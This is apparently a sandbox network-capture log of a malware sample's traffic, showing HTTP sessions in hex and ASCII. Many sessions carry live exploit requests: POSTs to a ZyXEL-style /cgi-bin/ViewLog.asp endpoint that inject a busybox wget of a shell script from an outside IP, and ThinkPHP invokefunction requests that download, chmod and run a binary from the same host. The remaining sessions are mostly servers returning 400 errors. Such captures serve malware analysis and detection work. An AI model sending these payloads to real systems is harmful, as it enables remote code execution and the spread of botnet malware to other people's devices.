                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            39192.168.2.233930094.122.216.718080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:54.081273079 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            40192.168.2.235929494.123.29.2528080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:54.082581997 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            41192.168.2.235997262.168.170.68080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:54.091983080 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            42192.168.2.2352140104.171.178.7323
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:54.829902887 CET179INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 37 3a 35 30 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:27:50Auth Result: .


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            43192.168.2.234154088.122.72.24880
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:54.886605978 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:27:55.097105026 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:27:54 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            44192.168.2.233958688.119.160.8380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:54.896013021 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:27:55.118081093 CET1286INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:27:55 GMT
                                                            Server: Apache
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade, close
                                                            Accept-Ranges: bytes
                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: 0
                                                            Content-Type: text/html
                                                            Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20
                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; }
                                                            Feb 14, 2024 09:27:55.118098974 CET1286INData Raw: 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20
                                                            Data Ascii: .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat;
                                                            Feb 14, 2024 09:27:55.118143082 CET1286INData Raw: 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a
                                                            Data Ascii: } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } foote
                                                            Feb 14, 2024 09:27:55.118170023 CET1286INData Raw: 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36
                                                            Data Ascii: float: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0;
                                                            Feb 14, 2024 09:27:55.118182898 CET1286INData Raw: 6b 6c 34 30 76 78 4a 6b 5a 2b 44 4f 32 4e 75 2f 33 48 6e 79 43 37 74 31 35 6f 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66
                                                            Data Ascii: kl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt
                                                            Feb 14, 2024 09:27:55.118194103 CET1286INData Raw: 32 74 69 57 66 63 46 6e 68 30 68 50 49 70 59 45 56 47 6a 6d 42 41 65 32 62 39 35 55 33 77 4d 78 69 6f 69 45 72 52 6d 32 6e 75 68 64 38 51 52 43 41 38 49 77 54 52 41 57 31 4f 37 50 41 73 62 74 43 50 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52
                                                            Data Ascii: 2tiWfcFnh0hPIpYEVGjmBAe2b95U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5K
                                                            Feb 14, 2024 09:27:55.118207932 CET1122INData Raw: 49 77 4a 74 4c 79 37 75 4e 36 50 65 2f 77 41 6e 72 42 78 4f 6e 41 61 79 49 53 4c 57 6b 51 38 77 6f 42 4b 79 52 2b 2b 64 55 54 73 75 45 4b 2b 4c 38 70 32 42 44 34 66 47 64 73 66 71 68 78 47 51 54 51 5a 6c 75 48 55 4c 58 72 52 73 55 46 66 42 45 30
                                                            Data Ascii: IwJtLy7uN6Pe/wAnrBxOnAayISLWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g
                                                            Feb 14, 2024 09:27:55.118323088 CET1286INData Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20
                                                            Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to cl04.bacloud.com's <a href="mailto:hostmaster@bacl
                                                            Feb 14, 2024 09:27:55.118335962 CET348INData Raw: 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 30 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74 3d 22 63 70 61 6e 65 6c 22 20 74 69 74 6c 65 3d 22 63 50 61 6e 65 6c 2c 20 49 6e 63 2e 22 3e 0a
                                                            Data Ascii: _content=logolink&utm_campaign=400referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="copyright">Copyright 2016 cPan


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            45192.168.2.234337095.164.195.17280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:55.010400057 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:27:55.129656076 CET495INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:27:55 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 301
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at 127.0.1.1 Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            46192.168.2.2352146104.171.178.7323
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:55.140552044 CET179INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 37 3a 35 30 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:27:50Auth Result: .


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            47192.168.2.235674095.216.94.23480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:55.229135990 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:27:55.447453022 CET490INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Wed, 14 Feb 2024 08:27:55 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            48192.168.2.234392695.158.56.22080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:55.237395048 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:27:55.465439081 CET515INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:27:55 GMT
                                                            Server: Apache
                                                            X-Frame-Options: SAMEORIGIN
                                                            Content-Security-Policy: frame-ancestors 'self'
                                                            X-XSS-Protection: 1; mode=block
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            49192.168.2.235871495.163.53.13480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:55.239491940 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:27:55.468271017 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:27:55 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            50192.168.2.2352164104.171.178.7323
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:55.491281986 CET179INHTTP/1.0 200 OK
                                                            Server: Proxy
